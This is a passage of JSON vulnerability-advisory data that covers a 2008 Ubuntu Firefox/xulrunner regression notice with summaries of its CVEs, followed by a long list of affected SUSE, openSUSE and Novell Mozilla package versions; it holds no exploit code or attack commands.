["https://usn.ubuntu.com/usn/usn-645-1", "https://launchpad.net/bugs/270429"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1.9.0.3+build1+nobinonly-0ubuntu0.8.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "3.0.3+build1+nobinonly-0ubuntu0.8.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}], "description": "USN-645-1 fixed vulnerabilities in Firefox and xulrunner. The upstream patches introduced a regression in the saved password handling. While password data was not lost, if a user had saved any passwords with non-ASCII characters, Firefox could not access the password database. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nJustin Schuh, Tom Cross and Peter Williams discovered errors in the Firefox URL parsing routines. If a user were tricked into opening a crafted hyperlink, an attacker could overflow a stack buffer and execute arbitrary code. (CVE-2008-0016)\n\nIt was discovered that the same-origin check in Firefox could be bypassed. If a user were tricked into opening a malicious website, an attacker may be able to execute JavaScript in the context of a different website. (CVE-2008-3835)\n\nSeveral problems were discovered in the JavaScript engine. This could allow an attacker to execute scripts from page content with chrome privileges. (CVE-2008-3836)\n\nPaul Nickerson discovered Firefox did not properly process mouse click events. If a user were tricked into opening a malicious web page, an attacker could move the content window, which could potentially be used to force a user to perform unintended drag and drop operations. (CVE-2008-3837)\n\nSeveral problems were discovered in the browser engine. This could allow an attacker to execute code with chrome privileges. (CVE-2008-4058, CVE-2008-4059, CVE-2008-4060)\n\nDrew Yao, David Maciejak and other Mozilla developers found several problems in the browser engine of Firefox. If a user were tricked into opening a malicious web page, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-4061, CVE-2008-4062, CVE-2008-4063, CVE-2008-4064)\n\nDave Reed discovered a flaw in the JavaScript parsing code when processing certain BOM characters. An attacker could exploit this to bypass script filters and perform cross-site scripting attacks. (CVE-2008-4065)\n\nGareth Heyes discovered a flaw in the HTML parser of Firefox. If a user were tricked into opening a malicious web page, an attacker could bypass script filtering and perform cross-site scripting attacks. (CVE-2008-4066)\n\nBoris Zbarsky and Georgi Guninski independently discovered flaws in the resource: protocol. An attacker could exploit this to perform directory traversal, read information about the system, and prompt the user to save information in a file. (CVE-2008-4067, CVE-2008-4068)\n\nBilly Hoffman discovered a problem in the XBM decoder. If a user were tricked into opening a malicious web page or XBM file, an attacker may be able to cause a denial of service via application crash. (CVE-2008-4069)", "edition": 3, "reporter": "Ubuntu", "published": "2008-09-25T00:00:00", "title": "Firefox and xulrunner regression", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4063", "CVE-2008-4067", "CVE-2008-3836", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4064", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-09-25T00:00:00", "id": "USN-645-3", "href": "https://usn.ubuntu.com/645-3/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:06:50", "references": [], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.7", "packageName": "mozilla-xulrunner", "packageFilename": "mozilla-xulrunner-1.8.0.14eol-0.7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.8.1.13-22.1", "packageName": "mozilla-xulrunner181-devel", "packageFilename": "mozilla-xulrunner181-devel-1.8.1.13-22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.80_seamonkey_1.0.4-10", "packageName": "mozilla-hu", "packageFilename": "mozilla-hu-1.80_seamonkey_1.0.4-10.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.4-0.12", "packageName": "mozilla-cs", "packageFilename": "mozilla-cs-1.8_seamonkey_1.0.4-0.12.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox-debuginfo", "packageFilename": "MozillaFirefox-debuginfo-2.0.0.17-0.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla", "packageFilename": "mozilla-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.4-0.11", "packageName": "mozilla-deat", "packageFilename": "mozilla-deat-1.8_seamonkey_1.0.4-0.11.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "1.8.1.17-0.1", "packageName": "mozilla-xulrunner181-devel", "packageFilename": "mozilla-xulrunner181-devel-1.8.1.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla", "packageFilename": "mozilla-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.3-1.1", "packageName": "MozillaFirefox-debugsource", "packageFilename": "MozillaFirefox-debugsource-3.0.3-1.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-venkman", "packageFilename": "seamonkey-venkman-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-devel", "packageFilename": "mozilla-devel-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox-translations", "packageFilename": "MozillaFirefox-translations-2.0.0.17-0.3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.8.1.13-22.1", "packageName": "mozilla-xulrunner181-32bit", "packageFilename": "mozilla-xulrunner181-32bit-1.8.1.13-22.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.22.0-37.1", "packageName": "epiphany-extensions-debuginfo", "packageFilename": "epiphany-extensions-debuginfo-2.22.0-37.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.7", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.7.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-devel", "packageFilename": "mozilla-devel-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-irc", "packageFilename": "seamonkey-irc-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.0.0.17-0.1", "packageName": "MozillaThunderbird", "packageFilename": "MozillaThunderbird-2.0.0.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-venkman", "packageFilename": "seamonkey-venkman-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-venkman", "packageFilename": "mozilla-venkman-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-devel", "packageFilename": "mozilla-devel-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.1", "packageName": "MozillaFirefox-translations", "packageFilename": "MozillaFirefox-translations-2.0.0.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.9", "packageName": "mozilla-xulrunner", "packageFilename": "mozilla-xulrunner-1.8.0.14eol-0.9.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.7", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-irc", "packageFilename": "seamonkey-irc-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.20.0-8.5", "packageName": "epiphany-devel", "packageFilename": "epiphany-devel-2.20.0-8.5.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.3-1.1", "packageName": "mozilla-xulrunner190-gnomevfs", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.3-1.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.9", "packageName": "mozilla-xulrunner-32bit", "packageFilename": "mozilla-xulrunner-32bit-1.8.0.14eol-0.9.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.9", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.9.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.22.1.1-25.1", "packageName": "epiphany-debuginfo", "packageFilename": "epiphany-debuginfo-2.22.1.1-25.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.4-0.12", "packageName": "mozilla-deat", "packageFilename": "mozilla-deat-1.8_seamonkey_1.0.4-0.12.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "1.8.1.17-0.1", "packageName": "mozilla-xulrunner181", "packageFilename": "mozilla-xulrunner181-1.8.1.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.3-1.1", "packageName": "MozillaFirefox-debuginfo", "packageFilename": "MozillaFirefox-debuginfo-3.0.3-1.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "1.8.0.14eol-0.9", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.9.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-venkman", "packageFilename": "mozilla-venkman-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.7", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.22.1.1-25.1", "packageName": "epiphany-devel", "packageFilename": "epiphany-devel-2.22.1.1-25.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-spellchecker", "packageFilename": "seamonkey-spellchecker-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox-debuginfo", "packageFilename": "MozillaFirefox-debuginfo-2.0.0.17-0.3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey", "packageFilename": "seamonkey-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "1.8.0.14eol-0.7", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.7.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.4-0.12", "packageName": "mozilla-deat", "packageFilename": "mozilla-deat-1.8_seamonkey_1.0.4-0.12.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.9", "packageName": "mozilla-xulrunner", "packageFilename": "mozilla-xulrunner-1.8.0.14eol-0.9.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.16.1-34", "packageName": "epiphany-doc", "packageFilename": "epiphany-doc-2.16.1-34.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-dom-inspector", "packageFilename": "mozilla-dom-inspector-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox", "packageFilename": "MozillaFirefox-2.0.0.17-0.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.3-1.1", "packageName": "mozilla-xulrunner190-32bit", "packageFilename": "mozilla-xulrunner190-32bit-1.9.0.3-1.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "1.8.0.14eol-0.7", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla", "packageFilename": "mozilla-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "1.8.0.14eol-0.9", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.9.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.3-1.1", "packageName": "mozilla-xulrunner190-debugsource", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.3-1.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey", "packageFilename": "seamonkey-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-calendar", "packageFilename": "mozilla-calendar-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-mail", "packageFilename": "mozilla-mail-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.0.0.17-0.1", "packageName": "MozillaThunderbird-debugsource", "packageFilename": "MozillaThunderbird-debugsource-2.0.0.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla", "packageFilename": "mozilla-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.4-0.11", "packageName": "mozilla-cs", "packageFilename": "mozilla-cs-1.8_seamonkey_1.0.4-0.11.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-dom-inspector", "packageFilename": "mozilla-dom-inspector-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.22.1.1-25.1", "packageName": "epiphany", "packageFilename": "epiphany-2.22.1.1-25.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox", "packageFilename": "MozillaFirefox-2.0.0.17-0.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.0.0.17-0.1", "packageName": "MozillaThunderbird-translations", "packageFilename": "MozillaThunderbird-translations-2.0.0.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-devel", "packageFilename": "mozilla-devel-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.4-0.11", "packageName": "mozilla-cs", "packageFilename": "mozilla-cs-1.8_seamonkey_1.0.4-0.11.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.0.0.17-0.1", "packageName": "MozillaThunderbird-devel", "packageFilename": "MozillaThunderbird-devel-2.0.0.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-irc", "packageFilename": "mozilla-irc-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.9", "packageName": "mozilla-xulrunner", "packageFilename": "mozilla-xulrunner-1.8.0.14eol-0.9.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.0.0.17-0.1", "packageName": "MozillaThunderbird", "packageFilename": "MozillaThunderbird-2.0.0.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.4-0.11", "packageName": "mozilla-deat", "packageFilename": "mozilla-deat-1.8_seamonkey_1.0.4-0.11.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.8.1.13-22.1", "packageName": "mozilla-xulrunner181-debuginfo", "packageFilename": "mozilla-xulrunner181-debuginfo-1.8.1.13-22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox", "packageFilename": "MozillaFirefox-2.0.0.17-0.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "1.8.1.17-0.1", "packageName": "mozilla-xulrunner181-devel", "packageFilename": "mozilla-xulrunner181-devel-1.8.1.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.3-1.1", "packageName": "mozilla-xulrunner190-debuginfo", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.3-1.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.0.0.17-0.1", "packageName": "MozillaThunderbird-debuginfo", "packageFilename": "MozillaThunderbird-debuginfo-2.0.0.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "1.8.1.17-0.1", "packageName": "mozilla-xulrunner181-l10n", "packageFilename": "mozilla-xulrunner181-l10n-1.8.1.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox-debuginfo", "packageFilename": "MozillaFirefox-debuginfo-2.0.0.17-0.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.8.1.13-22.1", "packageName": "mozilla-xulrunner181", "packageFilename": "mozilla-xulrunner181-1.8.1.13-22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "1.8.0.14eol-0.9", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.9.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "1.8.1.17-0.1", "packageName": "mozilla-xulrunner181-32bit", "packageFilename": "mozilla-xulrunner181-32bit-1.8.1.17-0.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.16.1-34", "packageName": "epiphany-extensions", "packageFilename": "epiphany-extensions-2.16.1-34.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-spellchecker", "packageFilename": "seamonkey-spellchecker-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.9", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.9.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox-translations", "packageFilename": "MozillaFirefox-translations-2.0.0.17-0.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-mail", "packageFilename": "mozilla-mail-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-debugsource", "packageFilename": "seamonkey-debugsource-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey", "packageFilename": "seamonkey-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.22.0-37.1", "packageName": "epiphany-extensions", "packageFilename": "epiphany-extensions-2.22.0-37.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.3-1.1", "packageName": "mozilla-xulrunner190-devel", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.3-1.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.3-1.1", "packageName": "mozilla-xulrunner190-translations", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.3-1.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.3-1.1", "packageName": "mozilla-xulrunner190-gnomevfs-32bit", "packageFilename": "mozilla-xulrunner190-gnomevfs-32bit-1.9.0.3-1.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-irc", "packageFilename": "mozilla-irc-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-irc", "packageFilename": "seamonkey-irc-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.7", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.7.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-irc", "packageFilename": "mozilla-irc-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.9", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.9.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-irc", "packageFilename": "mozilla-irc-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox-translations", "packageFilename": "MozillaFirefox-translations-2.0.0.17-0.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-venkman", "packageFilename": "mozilla-venkman-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.0.0.17-0.1", "packageName": "MozillaThunderbird-translations", "packageFilename": "MozillaThunderbird-translations-2.0.0.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-debuginfo", "packageFilename": "seamonkey-debuginfo-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.3-1.1", "packageName": "mozilla-xulrunner190-translations-32bit", "packageFilename": "mozilla-xulrunner190-translations-32bit-1.9.0.3-1.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": 